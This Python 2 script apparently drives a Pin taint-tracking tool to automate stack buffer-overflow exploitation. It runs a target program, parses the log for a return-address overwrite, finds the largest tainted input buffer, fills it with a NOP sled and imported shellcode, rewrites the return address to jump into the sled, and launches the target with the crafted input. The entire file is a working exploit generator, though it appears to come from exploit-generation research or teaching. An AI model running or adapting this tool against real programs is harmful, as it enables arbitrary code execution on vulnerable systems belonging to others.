#!/usr/bin/env python
# This is a supporting script for Exploiter.cpp
# it runs the Exploiter PinTool, parses the log file and 
# creates a payload to send the shellcode it has hardcoded 
# and exploit the target program
# usage: 
#  1. enter PinTool directory (cd obj-ia32)
#  2. run ../Exploiter.py <TARGET_PROGRAM> <TARGET_PARAM>

#imports
import sys
from subprocess import *
import os

#get configuration
from exploiter_cfg import *

print "* Exploit tool starting up"
print "** Testing exploitability"

#creating the commandline
CMDLINE = PIN_BASE+"pin -t Exploiter1.so -- "
PROGRAM = ""
for i in range(1, len(sys.argv)):
   PROGRAM += sys.argv[i] + " "
print "** Executing: ", CMDLINE + PROGRAM 

#execute program to create log
call( CMDLINE.split() + PROGRAM.split() )

#start parsing the log
#print "*** opening exploit.out"
f = open('exploit.out','r')
lines = f.readlines()
f.close()

#first, find the address overwritten
print "** Searching for return address overwrite"
while lines[0][0:9] != "Overwrite":
  lines.remove(lines[0])
  if len(lines) == 0:
     print "** Couldn't find an overwrite"
     sys.exit()
print "** Overwrite found, details:", lines[0]
lines.remove(lines[0])

#get the source operand corrseponding to the overwrite address
print "*** Locating input data that corresponds to the overwrite"
addr = []  #holds the indices of the addreses we need
for i in range(4):
   addr.append(int(lines[0].split()[6], 16))
   lines.remove(lines[0])

#for parsing, cleanup unncessary outputs
while lines[0][0:2] != "##":
   lines.remove(lines[0])
lines.remove(lines[0])

#parse the state of the taint at the moment of overwrite, save into lst
#trans is a dictionary that translates an address to its offset in the tainted input
lst = []
trans = {}
while lines[0][0:2] != "##":
    if (int(lines[0].split()[3], 16)) in addr:
        #ignore indices used for the return address
        #note we can similarly define other reserved bytes
        lines.remove(lines[0])
        continue
    lst.append( int(lines[0].split()[1], 16) )
    trans[ int(lines[0].split()[1], 16) ] = int(lines[0].split()[3], 16)
    lines.remove(lines[0])

#search for longest consecutive buffer
lst.sort()
max_len = 0
max_start = 0
cur_len = 0
cur_start = 0
for x in lst:
   if x == (cur_start + cur_len):
       cur_len += 1
   else:
       cur_len = 1
       cur_start = x
   
   if cur_len >= max_len: # >= to favor higher (on stack) addresses
       max_len = cur_len
       max_start = cur_start

print "** Maximum consecutive tainted buffer: ", max_len, " starts at address: ", hex(max_start)


#check we have enough room for the shellcode in the buffer we found
if max_len < len(s):
   print "** Max consecutive buffer too short - shellcode len is:", len(s)
   sys.exit()

#build the entire payload to deliver -> shellcode + nopsled in this case
nopsled_len = max_len - len(s)
nopsled = '\x90'*nopsled_len
print "** nopsled length is: ", nopsled_len

PL = nopsled + s

#use translation dictionary to put the payload into the original input
INPUT = list(sys.argv[2])
for i in range(max_len):
   INPUT[trans[max_start+i]-1] = PL[i]

#estimate target address to jump to as middle of the nopseld and correct for distance between stacks
target = max_start + (nopsled_len / 2) 
target += STACK_OFFSET   #correction to not running under Pin

print "** Jump target: ",hex(target)

#encode jump target into program input
for i in range(4):
#   print "*** ",addr[i], hex(target), hex(target % 256)
   INPUT[addr[i]-1] = chr(target % 256)
   target = target >> 8
INPUT = ''.join(INPUT)

#save copy of payload in exploit.bin
print "** saving modified output in exploit.bin for debugging"
xpl = open('exploit.bin','w')
xpl.write(INPUT)
xpl.close()

#print modified input and send to real program
print "** Attempting exploitation:"
print "*************"
call( [sys.argv[1], INPUT] )

